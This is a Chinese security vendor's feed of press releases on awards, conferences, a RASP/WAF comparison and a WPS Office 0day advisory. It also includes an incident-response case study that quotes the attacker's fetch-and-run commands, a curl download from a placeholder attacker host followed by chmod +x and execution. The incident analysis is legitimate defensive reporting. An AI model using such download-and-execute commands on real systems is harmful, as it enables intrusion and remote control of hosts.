铢积寸累，日就月将｜安芯网盾上榜安全牛网络安全行业全景图多个细分领域

4月7日，国内网络安全行业权威新媒体-安全牛发布《中国网络安全行业全景图（第十版）》，安芯网盾入选主机安全、终端安全管理、恶意代码防护、漏洞检测与管理、RASP、APT高级威胁防护、安全咨询与规划、安全运维与托管服务8个细分领域。 据悉，《中国网络安全行业全景图（第十版）》共收录456家国内网络安全企业和相关行业机构，较第九版增加23家；细分领域共收录3180项，较第九版增加571项。 其中，收录领域数量超过50项的企业有9家，占比1.97%；收录领域数量超过10项的企业有76家，占比16.67%；收录领域数量在6-10项的企业有98家，占比21.49%。结果显示我国网络安全行业仍然呈现技术碎片化、多样化发展态势，“专业化、精细化、特色化、新颖化”仍将是创新安全企业未来主要的发展方向。 安芯网盾作为国内首家内存安全落地厂商，一直专注于内存安全领域的研究和发展，创新性地开发了内存保护系统，填补了国内在内存安全实时检测与防御的空白。 内存保护系统聚焦高级威胁防护，基于细粒度的内存、系统和应用的行为分析及关联分析，实现指令级、内存级和应用级的三维监测，对当前的纵深防御体系形成有力补充。 尽量减少在攻击完成后再采取安全措施的“亡羊补牢”局面， 有效应对系统设计缺陷、外部入侵等威胁，实时防御并终止无文件攻击、0day漏洞攻击、内存马攻击等高级威胁，有效保障客户核心业务不被中断、核心数据不被窃取。  

2023-09-12 13:57:22311阅读

2023数博会 | 259家企业上榜2023中国大数据独角兽企业榜单，安芯网盾实力登榜

近日，“2023中国大数据独角兽企业榜单发布”活动在“2023贵阳数博会”上举行，本次活动发布2022中国大数据（潜在）独角兽企业共259家，安芯网盾实力登榜。 中国大数据潜在独角兽企业榜单是针对在大数据领域具备创新技术和商业模式，具有高成长潜力的企业所评选出的权威榜单。会上发布了《2023中国大数据（潜在）独角兽企业研究报告》，入选榜单的259家企业布局在底座层、治理层、应用层三个层次，分布于25个城市，呈现融资活跃度高、持续融资能力强、科技创新能力强等特点。据统计，超九成企业分布京津冀、长三角、粤港澳、成渝地区。从经济带来看，长三角地区108家，京津冀地区92家，粤港澳地区41家，成渝地区5家，四个地区企业数量合计246家，达到总数的95%。 安芯网盾作为内存安全领军者，以“保护数字世界的安宁”为使命，致力于为政府、金融、运营商、军工、教育、医疗、互联网及大型企业等行业客户提供新一代主机实时防护的相关产品和解决方案，实现对通用及信创主机的全方位防护，有效保障用户的核心业务不被阻断，核心数据不被窃取，产品和解决方案深受客户与合作伙伴好评。作为国内首家实现内存安全产品应用落地厂商，安芯网盾核心团队成员自2005年就专注于信息安全攻防对抗产品的研发并斩获多项国际大奖，拳头产品被多家业内分析机构和媒体评选为年度明星产品，安芯网盾也多次被评为具有发展潜力和行业价值的网络安全企业。 此次入选2023中国大数据潜在独角兽企业榜单，标志着安芯网盾在内存安全领域的地位和影响力得到了广泛认可。公司将继续加大对技术研发和创新的投入，不断提升产品和服务的质量，为客户提供更加安全可靠的内存安全解决方案。作为专注于内存安全的高新技术企业，安芯网盾将继续发挥引领作用，推动行业的进一步发展和创新。

2023-09-12 13:56:21257阅读

2023中关村论坛 | 展现创新实力，安芯网盾亮相中关村论坛国际技术交易大会

5月30日，为期六天的科技盛宴”2023年中关村论坛“成功闭幕，奏响开放合作最强音。安芯网盾携高级威胁解决方案亮相并在2023中关村论坛国际技术交易大会”第七届中国网信产业前锋汇“发表精彩演讲。 2023中关村论坛由科技部、国家发展改革委、工业和信息化部、国务院国资委、中国科学院、中国工程院、中国科协、北京市政府共同主办，旨在促进国内外科技界、产业界沟通交流与创新合作。前锋汇由中国（中关村）网络安全与信息化产业联盟自2016年发起的重要行业特色峰会活动。 近年来，随着各企事业单位攻防对抗能力的不断提升，攻击技术和手段也在不断发展变化，攻击方会采用0day漏洞利用攻击、无文件攻击、内存马攻击等高级攻击形式，甚至是结合社会工程学等方式来攻破企业网络。 安芯网盾技术副总裁张伟军在前锋汇上分享了安芯网盾基于内存安全技术应对未知威胁检测方面的最新成果。当前无文件攻击、基于内存的攻击愈演愈烈，很多客户面对新型攻击存在四大难点：看不准、看不懂、看不见以及看不住，也存在以为自己未遇到此类攻击而无需关注的情况。但是居安思危，我们需要通过新技术手段加强主动防御能力防患未然。他提到攻击者可以利用ChatGPT快速开发复杂恶意软件的变种，在未来的半年或一年里，攻击组织所形成的攻击频次预测可能会翻一倍、五倍甚至十倍。 安芯网盾作为国内最早专注于内存安全领域的企业，以新视角来应对日益增长的未知威胁问题，基于对内存访问行为和程序运行行为的深入细粒度监控，不但减小了主机监控盲区，降低了主机威胁事件漏报概率，还对已知威胁和未知威胁具备同等检出能力，具有高稳定性、高易用性、资源占用率小、低误报等特点。 中关村论坛以“创新与发展”为永久主题，自2007年起，历经十余年发展，中关村论坛已成为全球性、综合性、开放性的科技创新高端国际论坛。本届论坛围绕“开放合作·共享未来”年度主题，设置论坛会议、技术交易、展览展示、成果发布、前沿大赛、配套活动六大板块，共举办150余场活动，邀请80多个国家和地区的嘉宾出席，包括17位诺奖级嘉宾在内的近120位顶尖专家将发表高水平主旨演讲。  

2023-09-12 13:55:26263阅读

实力蝉联，安芯网盾连续4年入选CCIA网安强星企业榜单

近日，CCIA网安强星企业榜单“2023年中国网安产业竞争力50强、成长之星、潜力之星”由中国网络安全产业联盟（CCIA）发布，安芯网盾荣获2023年中国网络安全产业成长之星，连续4年实力登榜CCIA网安强星企业榜单。 安芯网盾以”保护数字世界的安宁“为使命，长期投入原创技术研究、标准建设和学术成果分享，申请了超过60项原创发明专利，在核心期刊发表过多篇学术论文，不断增强行业领先的内存保护技术、行为关联分析技术、RASP技术、AI聚类分析等技术能力的应用，旨在以技术创新为驱动保护关键信息技术设施的网络安全。 在资质方面，安芯网盾获得了国家和中关村双高新技术企业、北京市专精特新企业、AAA级信用企业、双软企业等权威企业资质，公安部销售许可证、国家保密局涉密信息系统产品检测认证、CCRC系列资质等产品资质，还获得了ISO9001、ISO14001、ISO20000-1、ISO27001、ISO45001、CMMI3等权威国际评估认证。 在国产化安全建设方面，安芯网盾核心产品从内核架构、技术能力及产品能力等维度，完成与麒麟、统信、华为、龙芯、兆芯、海光、曙光等国产化操作系统和CPU架构的兼容性认证，并与生态联盟和核心厂商建立紧密的合作关系，把安全基因注入到国产化产品的原生能力当中，协助提升产品安全开发水平，确保产品和系统安全性与功能性同步提升。 安芯网盾致力于为政府、金融、运营商、能源、轨交、教育、医疗、互联网及大中型企业等行业客户提供新一代高级威胁实时防护的产品和解决方案，帮助企业实时防御并终止无文件攻击、0day漏洞攻击、内存马攻击等高级威胁，实现对通用及信创主机的全方位立体防护，有效保障用户的核心业务不被阻断，核心数据不被窃取，产品和方案深受客户与合作伙伴好评，多次收到来自公安部一所、最高法、海关总署、中国烟草等企、事业单位感谢信。 安芯网盾作为内存安全的开拓者和领军者，创始团队自2005年就专注于信息安全攻防对抗产品的研发并斩获多项国际大奖，自2019年成立以来已完成由高瓴资本、云晖资本、招商局创投、蓝驰创投等知名投资机构的四轮融资，拳头产品被多家业内分析机构和媒体评选为年度明星产品，安芯网盾也多次被评为具有发展潜力和行业价值的网络安全新创企业。 此次荣获2023年CCIA成长之星，是产业界对安芯网盾在竞争力和成长性上的认可。作为网络安全领域高速成长的技术创新型企业，安芯网盾将继续发挥引领作用，推动行业的进一步发展和创新。 关于CCIA网安强星企业榜单 CCIA网安强星企业评选旨在客观、真实准确评估网络安全企业竞争力情况，研究网络安全市场格局演变趋势，自2023年3月份启动网络安全企业发展情况调研工作，本次调研延续前五次产业调研模式，调研企业数量近300家，最终收集到200家以上有效数据，由数说安全提供研究支持，经对有效数据的收集整理和分析研究最终评选出2023年中国网安产业竞争力50强，20家成长之星，30家潜力之星。 2023年中国网安产业成长之星主要针对成长期的企业，在数据基础上对企业竞争力和成长性2个维度对企业综合能力进行画像。 【竞争力】：是指企业在当前商业模式下呈现出的总体能力，是企业所拥有的资源到经营成果的转化。竞争力强的企业，通常能高效地调动和运用相关资源，形成较高的竞争壁垒，在市场中不断获得可观的经营回报。从我国网络安全企业的运营特点来看，我们对企业竞争力的量化评估从品牌、营销、产品、研发、服务和经营这六个维度展开。 竞争力评估指标：公众号影响力、官网影响力、百度品牌指数、安全业务营收和毛利、安全业务增长率、净利润率、收入构成情况、员工构成分布、服务资质、应急响应单位级别、销售许可证数量与级别、研发投入情况、专利情况、客户数量等。 【成长性】：关注企业成长周期、人员规模、业务规模、业务增长等情况。在今年评选中，将成长之星企业的人员规模最大不超过600人上调至最大不超过800人，这与当下我国网安产业的发展速度更加匹配。同时，更加看重企业的成长速度，企业成立时间越短，得分越高。

2023-09-12 13:53:42272阅读

安芯网盾获阿布扎比政府机构支持，走出“一带一路”网安企业发展新步伐

2023年7月7日，在全球数字经济大会闭幕式上，内存安全开拓者安芯网盾作为北京市优秀企业，获阿联酋阿布扎比政府机构支持，包括资金支持、加速业务开展、人才引进等，加速全球布局。 阿联酋阿布扎比经济发展部（ADDED）副部长拉希德·布洛希阁下表示，ADDED致力于推动酋长国的增长和繁荣，在支持阿布扎比经济的发展和多元化方面发挥着至关重要的作用。阿布扎比将着力推动从石油经济转向知识经济，通过吸引外资、营造良好营商环境、促进创新创业来实现这一目标。ADDED将与全球企业建立合作，欢迎更多中国企业到阿布扎比投资发展。 安芯网盾CEO姜向前表示，安芯网盾获得阿布扎比政府机构的支持，对于安芯网盾来讲具有里程碑式的意义，后续安芯网盾将与当地政府共同促进和发展“一带一路”沿线地区的网络安全建设。作为中国优秀的网络安全创业企业，也将做好促进北京和阿布扎比两个国际级城市产业合作的“传声筒”，以点滴之力推动城市间建立开放共享，紧密协同的技术创新合作示范。 当前，安芯网盾已经在阿布扎比注册了全资子公司，积极探索和积累“一带一路”框架下的创业企业出海经验，以阿布扎比为企业战略支点，为阿联酋及中东、北非地区等“一带一路”沿线客户提供全方位优质的网络安全产品和服务，同时安芯网盾加入华为云丝绸之路技术生态伙伴为丝绸之路技术生态赋能，并与阿布扎比大学加强校企合作深化产教融合。 安芯网盾作为内存安全开拓者和领军者，以“保护数字世界的安宁”为使命，致力于为政府、金融、运营商、能源、轨交、教育、医疗、互联网及大中型企业等行业客户提供新一代高级威胁实时防护的相关产品和解决方案，帮助企业实时防御并终止无文件攻击、0day漏洞攻击、内存马攻击等高级威胁，有效保障用户的核心业务不被阻断，核心数据不被窃取，产品和解决方案，深受全球客户与合作伙伴好评。

2023-09-12 13:52:17313阅读

透视镜 既生瑜，何生亮：RASP来了，WAF将何去何从？

近年来，Web应用层的对抗失衡问题愈演愈烈，Apache Log4j 开源组件和Spring 开源应用开发框架相继被曝出高危漏洞，其波及范围之广引发各界对开源组件0Day漏洞的担忧。WAF（Web Application Firewall, 应用程序防火墙）一直以来被认为是抵御web攻击的有效防护手段，但是WAF在0Day防护上显得束手无措，RASP（Runtime Application Self-Protection，应用运行时自我保护）出现并成为解决Web防护的新技术迅速在业内推广，RASP技术的市场关注度持续升温。那么，RASP来了，WAF将何去何从？ WAF是一种专门用于分析HTTP/HTTPS流量的专用防火墙，可以深入到每一次 HTTP/HTTPS请求和详情中去检查是否包含敏感字段，然后放行正常行为，拦截恶意行为，就像自来水过滤器一样，把“杂质”从庞大的流量中剔除出去，这样应用程序就只会响应正常的请求，从而达到保护应用程序的目的。 RASP是一种在服务器运行的应用程序运行时技术。运行时应用自我保护旨在实时检测应用程序的攻击。RASP的概念最早由Gartner在2014年提出，即“运行时自我保护”，指对应用程序的保护不应该单纯依赖于外部的系统，而应该使程序自身带有自我保护的能力。RASP在实现或构建的过程中会被链接到应用程序的运行环境中，并能够控制应用程序代码的执行，实时地检测和阻止攻击行为。 RASP和WAF都有着各自的优势，从部署的方式上就能感知到它们都具备各自擅长的领域，WAF直接在边界入口进行部署，RASP通常是以agent形态进行部署，注入到应用程序中。 WAF更擅长于分析应用流量，可以深入到每一次 HTTP/HTTPS请求和详情中去检查是否包含敏感字段，然后放行正常行为，拦截恶意行为，对于CC攻击、爬虫、恶意扫描这些大流量的攻击或者有明显攻击特征的流量有着显著的防护效果，但如果对流量进行加密和混淆，WAF在解密流量时，由于无法深入到应用内部，就无法起到防护效果了，容易被轻松绕过；而RASP是从应用内部对关键函数操作的数据进行分析，即使原始请求经过加密和混淆，但是它在应用内传播到最终的底层函数时将会以明文方式被RASP截获，因此相比WAF能减少大量的误报和漏报问题。 WAF在防御已知漏洞方面可以起到效果，但是基于规则的防护方式无法防御0day漏洞，而RASP则可以保护应用运行时环境中的所有代码，包括自研代码、第三方组件、Web应用容器（Tomcat、Django、Flask等）。所以不管攻击方式千变万化，攻击手段如何隐蔽，收敛到攻击步骤总是无法绕开调用一些底层的关键函数，因此RASP对于0-day漏洞利用攻击做到有效拦截。 WAF在维护上需要频繁更新规则，且安全运营人员需要对业务逻辑和WAF配置参数深入了解结合后，才能配置出精准高效的策略；由于RASP从底层函数进行保护，所以基本上不需要对RASP的规则做任何调整即可实现应用的安全内建。 可以将WAF和RASP形象的比喻为一栋大楼的门厅保安和私人管家，WAF“保安”可以根据某些特征来区别是否是坏人，比如戴黑色头套、携带铁棍等，具有这些特征的一类人都会被阻止进入，但是一旦坏人换了白色头套、木棍，可能WAF“保安”就识别不出了；而RASP“私人管家”不管坏人具备什么样的特征，如何去变换特征，只要做出有危险出格的行为就会直接阻止。 总结来讲，拥有WAF和RASP（特定模块可进行入侵式部署和更新）可以加强企业的防御。WAF可以主动阻止DDOS、机器人保护和常见的OWASP攻击，但RASP可以拥有更深入的应用程序特定策略。

2023-09-12 13:51:25271阅读

实战攻防 | 安芯网盾可实时防护WPS Office高危0day漏洞

8月9日，安芯网盾安全团队监测到WPS Office for Windows版本存在0day漏洞，受影响版本： WPS Office个人版，Windows平台，版本号：低于 12.1.0.15120（含） WPS Office机构版本，Windows平台，版本号：低于11.8.2.12055（含） 行为分析： 1. 通过docx办公文档实现利用，用户通过wps打开恶意docx文档后，wps.exe会解析payload并执行恶意代码。 2. 该恶意代码会被加载至内存，实现执行shellcode。 3. 可以通过这个漏洞下载远控木马，控制被攻陷主机。 经过POC验证，安芯网盾内存安全产品可防 关于内存安全产品 安芯网盾内存安全产品采用独特的内存探针技术，实时监测内存层的程序读、写、执行行为，对PB级样本进行AI聚类学习，辅以超过十几年的反病毒从业经验的专家人工武器库情报搜集及专项样本定点分析，提炼出覆盖7大攻击阶段的80+类行为，200+个攻击路径特征，对系统层的异常连接、侦查探测、篡改劫持、隐藏伪装、权限提升、远程控制、恶意文件等攻击行为进行发现、告警与阻断，能有效防范内存攻击、无文件攻击、漏洞利用攻击、内存组件注册等攻击行为，抵御高级威胁，并发现未知威胁，为主机和终端提供精准的靶心防护能力。

2023-09-12 13:49:56265阅读

攻防实战 | 实时为王，安芯神甲秒级检测案例

8月16日，安芯网盾帮助蓝军安全团队发现一起nday漏洞利用与C2远控的主机失陷事件，安芯神甲内存保护系统（以下简称“安芯神甲”）在众多产品中脱颖而出，领先半小时发现攻击，安芯网盾应急响应团队仅用10分钟帮助用户找到攻击者位置。 · 安芯神甲策略配置，策略配置完毕，即可实时监测服务器行为，并判断是否存在异常。 · 8月16日 11:22，蓝军值守团队，利用安芯神甲帮助客户发现一起反弹shell告警。 根据安芯神甲告警信息迅速研判确认，这是一起真实攻击事件。客户立即对外联ip进行封禁，同时安芯网盾蓝军值守团队立即对该攻击进行溯源。相关过程如下： · 8月16日 11:28 获取流量侧的数据包，总大小约2个G。 再通过editcap工具对该流量包进行切片，然后逐片分析。 · 8月16日 11:41 审计到反弹shell的TCP流量，并获取到攻击者执行的命令。 攻击者在getshell之后执行的操作如下，首先执行了 curl http://attackervpsip/java 测试连接成功的，然后通过 curl http://attackervpsip/java -o /tmp/java 下载了可执行文件至/tmp目录下，然后通过 chmod +x /tmp/java 为该可执行程序赋予执行权限，最后运行。 导出该可执行文件放入某沙箱平台进行分析。 确认到攻击者C2服务器地址ip，客户对该ip进行封堵。 研判攻击入口。 · 8月16日 11:53 获取上述HTTP请求判断，攻击者使用若依框架的nday漏洞snakeyaml rce执行命令获取权限的攻击手法，同时在该请求中发现了攻击者使用设备的ip，根据攻击者的IP进行溯源，成功获取到攻击者的位置信息。 成果和结论 在本次攻防事件中，除去抓取流量的时间外，安芯网盾应急响应团队从发现安芯神甲产品告警到溯源定位，最后找到攻击者位置仅用时10分钟，给用户争取了足够的时间去快速发现和响应各种安全威胁。 攻防实战，实时为王。本次用户单位所部署了安芯神甲，具有响应迅速、误报率低、告警信息准确有效的特点，能够实时监测和分析系统的运行状态，并对异常行为进行快速识别和响应。这种独特的能力使得安芯神甲可以及时发现并阻止潜在的攻击行为，从而保护系统免受威胁。另外，通过精确的算法和智能分析技术，安芯神甲能够准确地识别恶意行为，大幅度降低了误报率，极大提高了研判分析效率，能够帮助网络安全管理员快速定位存在问题的主机，并高效进行溯源分析与应急响应。

2023-09-12 13:48:15255阅读

安芯网盾参编工信部《信创安全发展蓝皮书—系统安全分册》发布，助力信创安全发展

近日，工业和信息化部电子第五研究所与大数据协同安全技术国家工程研究中心联合发布了《信创安全发展蓝皮书—系统安全分册》。作为国内内存安全领域的领军者，安芯网盾积极参与编制，助力我国信创安全事业发展。 本蓝皮书全面梳理了信创系统安全的现状，深入剖析了政务、金融、工业、交通、能源等行业领域中存在的系统安全威胁与挑战。蓝皮书还提出了关于信创网络安全发展的建议，为企业系统网络安全提供了宝贵的建议和指导。 自主知识产权是保障信创系统安全的关键要素。安芯网盾自成立之初便深耕内存安全，是国内首家实现内存安全应用落地厂商。目前，安芯网盾研发的原创技术已申请60余项专利，深入研究了领先于行业的内存安全技术、RASP技术、AI聚类分析等技术应用，研发实力深受认可。 当前，信创安全不仅是数据安全和网络安全的支柱，更是推动我国数字经济发展的新引擎。安芯网盾推出的内存安全、应用安全等产品为政府、金融、运营商、能源、轨交、教育、医疗、互联网以及各大中型企业等不同领域的客户提供了新一代高级威胁实时防护的解决方案，有效协助企业抵御无文件攻击、0day漏洞攻击、内存马攻击等高级威胁。 未来，安芯网盾将继续发挥领先的内存保护技术优势，进一步加大技术研发和创新的力度，提高自主研发实力，为国家数字化转型和信创产业的健康发展贡献积极力量。

2023-09-12 13:46:12283阅读

安芯网盾作为安全419推荐优秀企业，亮相CCS成都网络安全大会

近日，由四川省互联网信息办公室指导，成都市互联网信息办公室、成都高新技术产业开发区管理委员会联合主办的2023CCS成都网络安全大会盛大召开。安芯网盾作为安全419推荐优秀企业亮相2023CCS成都网络安全大会，受邀参加“FP30新锐安全企业家论坛”，并在大会优秀企业展区重点推介了内存安全产品和高级威胁实时防护解决方案。 安全419是本次大会官方指定唯一战略合作媒体，由安全419承办，安芯网盾与威努特、众智维科技、云科安信、酷德啄木鸟、边界无限等6家企业协办的FP30新锐企业家论坛在大会期间重磅举行，该论坛以“挖掘行业新锐力量 护航安全产业发展”为主题，邀请到了产业界中各个赛道领先的新锐企业代表、行业专家及意见领袖，以及产业发展相关的行业客户、第三方投资机构、媒体、人力资源机构等共同参与探讨产业发展之路。安芯网盾运营副总裁朱颖作为企业代表，就安芯网盾作为创新驱动的创业企业快速成长的商业成长经验和创新实践成果发表演讲。 同时，安全419在论坛中发布了“FP30”计划（Future Power 30，未来新锐力量TOP30），旨在发掘行业中未来最有可能成为中坚力量的新锐企业，打造FP30品牌，助推入选企业在品牌、营销等层面得到良好提升，并力求打造一个行业精英企业生态圈，推动新锐企业的发展。安芯网盾作为内存安全细分领域优秀企业代表，受邀成为首批“FP30” 计划的联合发起单位。 2023 CCS成都网络安全大会以 “赋能数字安全，共筑智慧城市” 为主题，设置了10余场论坛，60余项演讲议题，邀请了中国工程院院士方滨兴、中国工程院院士陈鲸、九三学社中央委员会原副主席贺铿、国务院国有重点大型企业监事会原主席季晓南以及成都市人民政府副市长陈志勇等安全产业供需两端资深专家共话数字安全及安全产业发展。  

2023-09-12 13:45:05260阅读